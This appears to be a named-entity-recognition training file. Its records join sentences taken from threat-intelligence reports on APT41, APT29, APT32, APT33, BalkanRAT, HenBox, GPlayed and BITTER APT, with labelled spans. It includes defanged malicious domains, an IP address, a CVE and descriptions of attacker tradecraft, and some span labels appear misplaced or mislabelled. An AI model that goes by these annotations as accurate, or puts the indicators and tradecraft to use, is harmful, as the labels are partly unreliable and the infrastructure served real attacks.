All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": [{"start": 162, "end": 167, "label": "Organization"}]} {"text": "To date , Unit 42 has seen four of the seven ( the first three in the list below , along with cdncool [ . APT41 has been observed creating a RAR archive of targeted files for exfiltration . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group works in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": [{"start": 94, "end": 105, "label": "Indicator"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 264, "end": 282, "label": "Malware"}, {"start": 428, "end": 438, "label": "Malware"}]} {"text": "] com ) used in malicious activity and it is reasonable to assume the remaining three are or were intended to serve the same purpose . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": [{"start": 125, "end": 134, "label": "Indicator"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 318, "end": 326, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 371, "end": 376, "label": "Organization"}]} {"text": "tcpdo [ . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . 
APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 251, "end": 267, "label": "Malware"}, {"start": 276, "end": 307, "label": "Malware"}, {"start": 382, "end": 388, "label": "Organization"}]} {"text": "] net adminsysteminfo [ . Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": [{"start": 6, "end": 25, "label": "Indicator"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 241, "end": 249, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 308, "end": 315, "label": "Malware"}]} {"text": "] com md5c [ . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": [{"start": 6, "end": 14, "label": "Indicator"}, {"start": 15, "end": 20, "label": "Organization"}, {"start": 40, "end": 56, "label": "Organization"}, {"start": 59, "end": 74, "label": "Organization"}, {"start": 81, "end": 97, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}]} {"text": "] net linkdatax [ . For example , the group has repeatedly targeted call record information at telecom companies . 
In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 38, "end": 43, "label": "Organization"}, {"start": 95, "end": 102, "label": "Organization"}, {"start": 103, "end": 112, "label": "Organization"}, {"start": 137, "end": 145, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 194, "end": 201, "label": "Malware"}]} {"text": "] com csip6 [ . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 16, "end": 21, "label": "Organization"}, {"start": 94, "end": 104, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}]} {"text": "] biz adminloader [ . The group\u2019s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . 
FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests .", "spans": [{"start": 6, "end": 21, "label": "Indicator"}, {"start": 94, "end": 113, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}]} {"text": "] com Unit 42 published a blog in July 2016 about 9002 malware being delivered using a combination of shortened links and a file hosted on Google Drive . In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 50, "end": 54, "label": "Malware"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 457, "end": 468, "label": "Organization"}, {"start": 493, "end": 503, "label": "Organization"}, {"start": 508, "end": 519, "label": "Organization"}]} {"text": "The spear phishing emails had Myanmar political-themed lures and , if the 9002 C2 server responded , the Trojan sent system specific information along with the string \u201c jackhex \u201d . These supply chain compromise tactics have also been characteristic of APT41\u2019s best known and most recent espionage campaigns . From 2016 through 2017 , two subsidiaries of U.S. 
and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": [{"start": 74, "end": 78, "label": "Malware"}, {"start": 252, "end": 259, "label": "Organization"}, {"start": 374, "end": 404, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}]} {"text": "\u201c jackhex \u201d has also been part of a C2 for what is likely related Poison Ivy activity detailed below , along with additional infrastructure ties . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": [{"start": 66, "end": 76, "label": "Malware"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 445, "end": 475, "label": "Organization"}, {"start": 522, "end": 527, "label": "Organization"}]} {"text": "The C2 for the aforementioned 9002 sample was logitechwkgame [ . Mapping the group\u2019s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 30, "end": 34, "label": "Malware"}, {"start": 46, "end": 64, "label": "Indicator"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 360, "end": 371, "label": "Indicator"}, {"start": 431, "end": 439, "label": "Organization"}]} {"text": "] com , which resolved to the IP address 222.239.91 [ . 
The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group\u2019s later espionage operations . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 .", "spans": [{"start": 41, "end": 55, "label": "Indicator"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}]} {"text": "] 30 . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": [{"start": 7, "end": 12, "label": "Organization"}, {"start": 55, "end": 71, "label": "System"}, {"start": 76, "end": 81, "label": "System"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 357, "end": 368, "label": "Indicator"}]} {"text": "At the same time , the domain admin.nslookupdns [ . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . 
Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": [{"start": 23, "end": 51, "label": "Indicator"}, {"start": 84, "end": 89, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 218, "end": 238, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 316, "end": 335, "label": "Organization"}]} {"text": "] com also resolved to the same IP address , suggesting that these two domains are associated with the same threat actors . APT41 often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 354, "end": 364, "label": "Malware"}, {"start": 367, "end": 375, "label": "Malware"}, {"start": 378, "end": 387, "label": "Malware"}, {"start": 394, "end": 401, "label": "Malware"}]} {"text": "In addition , admin.nslookupdns [ . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . 
In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 14, "end": 35, "label": "Indicator"}, {"start": 36, "end": 41, "label": "Organization"}, {"start": 210, "end": 228, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 375, "end": 395, "label": "Organization"}]} {"text": "] com was a C2 for Poison Ivy samples associated with attacks on Myanmar and other Asian countries discussed in a blog published by Arbor Networks in April 2016 . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 132, "end": 146, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 366, "end": 395, "label": "Malware"}]} {"text": "Another tie between the activity is the C2 jackhex.md5c [ . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015 . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor .", "spans": [{"start": 43, "end": 59, "label": "Indicator"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 330, "end": 352, "label": "Malware"}]} {"text": "] net , which was also used as a Poison Ivy C2 in the Arbor Networks blog . 
This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 165, "end": 184, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}]} {"text": "\u201c jackhex \u201d is not a common word or phrase and , as noted above , was also seen in the beacon activity with the previously discussed 9002 sample . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": [{"start": 133, "end": 137, "label": "Malware"}, {"start": 147, "end": 156, "label": "Malware"}, {"start": 190, "end": 197, "label": "Malware"}, {"start": 267, "end": 277, "label": "Malware"}, {"start": 383, "end": 393, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}]} {"text": "Finally , since publishing the 9002 blog , Unit 42 has also seen the aforementioned 9002 C2 used as a Poison Ivy C2 with a Myanmar political-themed lure . 
With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": [{"start": 31, "end": 35, "label": "Malware"}, {"start": 84, "end": 88, "label": "Malware"}, {"start": 102, "end": 112, "label": "Malware"}, {"start": 245, "end": 254, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 353, "end": 361, "label": "Organization"}, {"start": 436, "end": 444, "label": "Organization"}, {"start": 498, "end": 508, "label": "Organization"}]} {"text": "In our 9002 blog we noted some additional infrastructure used either as C2s for related Poison Ivy samples , or domain registrant overlap with those C2 domains . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": [{"start": 7, "end": 11, "label": "Malware"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 217, "end": 233, "label": "Organization"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 373, "end": 394, "label": "Malware"}, {"start": 450, "end": 463, "label": "Malware"}, {"start": 466, "end": 477, "label": "Malware"}, {"start": 482, "end": 489, "label": "Malware"}]} {"text": "When we published that blog Unit 42 hadn \u2019 t seen any of the three registrants overlap domains used in malicious activity . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . 
However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": [{"start": 436, "end": 441, "label": "Organization"}]} {"text": "Since then , we have seen Poison Ivy samples using third-levels of querlyurl [ . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": [{"start": 26, "end": 36, "label": "Malware"}, {"start": 67, "end": 80, "label": "Indicator"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}]} {"text": "] com , lending further credence the remaining two domains , gooledriveservice [ . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . We assess APT33 works at the behest of the Iranian government .", "spans": [{"start": 61, "end": 82, "label": "Indicator"}, {"start": 117, "end": 127, "label": "Organization"}, {"start": 217, "end": 231, "label": "Vulnerability"}, {"start": 244, "end": 249, "label": "Organization"}]} {"text": "] com and appupdatemoremagic [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea .", "spans": [{"start": 10, "end": 32, "label": "Indicator"}, {"start": 38, "end": 47, "label": "Malware"}, {"start": 52, "end": 62, "label": "Malware"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 169, "end": 197, "label": "Organization"}]} {"text": "] com are or were intended for malicious use . 
According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": [{"start": 196, "end": 206, "label": "Organization"}, {"start": 245, "end": 265, "label": "Malware"}, {"start": 273, "end": 289, "label": "Organization"}]} {"text": "While we do not have complete targeting , information associated with these Poison Ivy samples , several of the decoy files were in Chinese and appear to be part of a 2016 campaign targeting organizations in Taiwan with political-themed lures . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": [{"start": 76, "end": 86, "label": "Malware"}, {"start": 278, "end": 288, "label": "Malware"}, {"start": 473, "end": 487, "label": "Vulnerability"}, {"start": 490, "end": 495, "label": "Organization"}, {"start": 550, "end": 565, "label": "Organization"}, {"start": 600, "end": 613, "label": "Organization"}, {"start": 627, "end": 640, "label": "Organization"}]} {"text": "Conclusion Typically masquerading as legitimate Android system apps , and sometimes embedding legitimate apps within them , the primary goal of the malicious HenBox appears to be to spy on those who install them . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen\u2026 and using BalkanRAT , they can do whatever they want on the computer . From mid-2016 through early 2017 , APT33 compromised a U.S. 
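The BalkanDoor delivery described above, an ACE archive carrying a `.rar` name so that WinRAR's ACE handler processes it, is the kind of lure that a simple magic-versus-extension check catches before any archive is opened. The following is an added example, not code from the ESET write-up; the byte layouts are the published ACE main-header signature (`**ACE**` at offset 7) and the RAR 4/5 magic, and the sample file names and contents are constructed stubs, not real archives.

```python
"""Detect archives whose extension says RAR but whose header says ACE.

Added example. Signature offsets follow the public ACE and RAR header formats;
the sample files written by build_samples() are constructed stubs.
"""
import os
import tempfile
from typing import Dict, List

RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
ACE_SIGNATURE = b"**ACE**"   # ACE main header: 7 bytes of CRC/size/type/flags, then this
ACE_SIG_OFFSET = 7


def archive_format(header: bytes) -> str:
    """Classify a file from its leading bytes: 'rar', 'ace' or 'unknown'."""
    if header.startswith(RAR5_MAGIC) or header.startswith(RAR4_MAGIC):
        return "rar"
    if header[ACE_SIG_OFFSET:ACE_SIG_OFFSET + len(ACE_SIGNATURE)] == ACE_SIGNATURE:
        return "ace"
    return "unknown"


def check_file(path: str) -> Dict[str, str]:
    """Compare the extension with the container format actually on disk.
    Any ACE payload is flagged (WinRAR opened ACE content regardless of the
    file name, which is what the CVE-2018-20250 lures relied on), and a .rar
    whose header is neither RAR nor ACE is flagged as a plain mismatch."""
    with open(path, "rb") as fh:
        head = fh.read(32)
    ext = os.path.splitext(path)[1].lower().lstrip(".")
    fmt = archive_format(head)
    verdict = "ok"
    if fmt == "ace":
        verdict = "suspicious: ACE content" + (" under .rar name" if ext == "rar" else "")
    elif ext == "rar" and fmt != "rar":
        verdict = "suspicious: extension/magic mismatch"
    return {"path": path, "ext": ext, "format": fmt, "verdict": verdict}


def scan(paths: List[str]) -> List[Dict[str, str]]:
    return [check_file(p) for p in paths]


def build_samples(directory: str) -> List[str]:
    """Write three constructed files: a RAR5 stub, an ACE header stub carrying a
    .rar name, and plain text with a .rar name."""
    samples = {
        "invoice.rar": RAR5_MAGIC + b"\x00" * 16,
        "taxes_2019.rar": b"\x00" * 7 + ACE_SIGNATURE + b"\x00" * 16,
        "readme.rar": b"just text",
    }
    paths = []
    for name, data in samples.items():
        path = os.path.join(directory, name)
        with open(path, "wb") as fh:
            fh.write(data)
        paths.append(path)
    return paths


def demo() -> Dict[str, Dict[str, str]]:
    """Build the samples in a temporary directory, scan them and return the
    results keyed by file name."""
    with tempfile.TemporaryDirectory() as directory:
        return {os.path.basename(r["path"]): r for r in scan(build_samples(directory))}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: format={result['format']} verdict={result['verdict']}")
```

The check is deliberately independent of the extension because that is the whole point of the lure: the name is chosen to look like a RAR, so the format decision has to come from the header.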
organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": [{"start": 48, "end": 55, "label": "Malware"}, {"start": 158, "end": 164, "label": "Malware"}, {"start": 248, "end": 256, "label": "Organization"}, {"start": 314, "end": 323, "label": "System"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 455, "end": 471, "label": "Organization"}, {"start": 487, "end": 508, "label": "Organization"}]} {"text": "Using similar traits , such as copycat iconography and app or package names , victims are likely socially engineered into installing the malicious apps , especially when available on so-called third-party ( i.e . The BalkanDoor backdoor does not implement any exfiltration channel . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": [{"start": 217, "end": 227, "label": "System"}, {"start": 228, "end": 236, "label": "System"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 390, "end": 406, "label": "Organization"}]} {"text": "non-Google Play ) app stores which often have fewer security and vetting procedures for the apps they host . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . 
During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": [{"start": 11, "end": 15, "label": "System"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 125, "end": 135, "label": "System"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 326, "end": 338, "label": "Organization"}, {"start": 343, "end": 357, "label": "Organization"}]} {"text": "It \u2019 s possible , as with other Android malware , that some apps may also be available on forums , file-sharing sites or even sent to victims as email attachments , and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 281, "end": 289, "label": "Malware"}, {"start": 294, "end": 301, "label": "Malware"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 443, "end": 455, "label": "Organization"}, {"start": 475, "end": 496, "label": "Organization"}, {"start": 505, "end": 519, "label": "Indicator"}, {"start": 592, "end": 613, "label": "Organization"}]} {"text": "The hosting locations seen for some HenBox samples , together with the nature of some embedded apps including : those targeted at extremist groups , those who use VPN or other privacy-enabling apps , and those who speak the Uyghur language , highlights the victim profile the threat actors were seeking to attack . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . 
More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 336, "end": 353, "label": "Malware"}, {"start": 447, "end": 452, "label": "Organization"}, {"start": 519, "end": 533, "label": "Indicator"}]} {"text": "The targets and capabilities of HenBox , in addition to the ties to previous activity using four different Windows malware families with political-themed lures against several different South East Asian countries , indicates this activity likely represents an at least three-year-old espionage campaign . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": [{"start": 32, "end": 38, "label": "Malware"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 341, "end": 351, "label": "System"}, {"start": 580, "end": 585, "label": "Organization"}, {"start": 749, "end": 757, "label": "Organization"}]} {"text": "THURSDAY , OCTOBER 11 , 2018 GPlayed Trojan - .Net playing with Google Market Introduction In a world where everything is always connected , and mobile devices are involved in individuals ' day-to-day lives more and more often , malicious actors are seeing increased opportunities to attack these devices . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . 
APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 444, "end": 449, "label": "Organization"}, {"start": 613, "end": 621, "label": "Organization"}]} {"text": "Cisco Talos has identified the latest attempt to penetrate mobile devices \u2014 a new Android trojan that we have dubbed \" GPlayed . Based on the Let\u2019s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 82, "end": 89, "label": "System"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 293, "end": 299, "label": "Organization"}, {"start": 304, "end": 318, "label": "Organization"}, {"start": 384, "end": 397, "label": "Organization"}, {"start": 459, "end": 465, "label": "Organization"}]} {"text": "'' This is a trojan with many built-in capabilities . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . 
APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 154, "end": 162, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 244, "end": 250, "label": "System"}, {"start": 254, "end": 263, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}]} {"text": "At the same time , it 's extremely flexible , making it a very effective tool for malicious actors . Further analysis of the BITTER APT\u2019s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": [{"start": 125, "end": 137, "label": "Organization"}, {"start": 207, "end": 223, "label": "Organization"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 330, "end": 348, "label": "Organization"}]} {"text": "The sample we analyzed uses an icon very similar to Google Apps , with the label \" Google Play Marketplace '' to disguise itself . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . 
We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries .", "spans": [{"start": 52, "end": 63, "label": "System"}, {"start": 83, "end": 106, "label": "System"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 307, "end": 312, "label": "Malware"}, {"start": 313, "end": 320, "label": "Malware"}]} {"text": "The malicious application is on the left-hand side . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 296, "end": 305, "label": "Organization"}, {"start": 310, "end": 316, "label": "Organization"}]} {"text": "What makes this malware extremely powerful is the capability to adapt after it 's deployed . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . 
APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": [{"start": 160, "end": 170, "label": "Organization"}, {"start": 185, "end": 204, "label": "Organization"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 322, "end": 325, "label": "Indicator"}, {"start": 366, "end": 379, "label": "Organization"}]} {"text": "In order to achieve this adaptability , the operator has the capability to remotely load plugins , inject scripts and even compile new .NET code that can be executed . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . This coupled with the timing of operations \u2013 which coincides with Iranian working hours \u2013 and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": [{"start": 135, "end": 139, "label": "System"}, {"start": 252, "end": 262, "label": "Organization"}, {"start": 547, "end": 559, "label": "Malware"}, {"start": 589, "end": 594, "label": "Organization"}]} {"text": "Our analysis indicates that this trojan is in its testing stage but given its potential , every mobile user should be aware of GPlayed . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . 
The publicly available backdoors and tools utilized by APT33 \u2013 including NANOCORE , NETWIRE , and ALFA Shell \u2013 are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": [{"start": 127, "end": 134, "label": "Malware"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 304, "end": 312, "label": "Malware"}, {"start": 315, "end": 322, "label": "Malware"}, {"start": 329, "end": 339, "label": "Malware"}, {"start": 460, "end": 473, "label": "Organization"}]} {"text": "Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People\u2019s Republic of China . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": [{"start": 199, "end": 206, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 440, "end": 448, "label": "Organization"}, {"start": 512, "end": 520, "label": "Organization"}, {"start": 597, "end": 605, "label": "Organization"}]} {"text": "But GPlayed is an example of where this can go wrong , especially if a mobile user is not aware of how to distinguish a fake app versus a real one . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . 
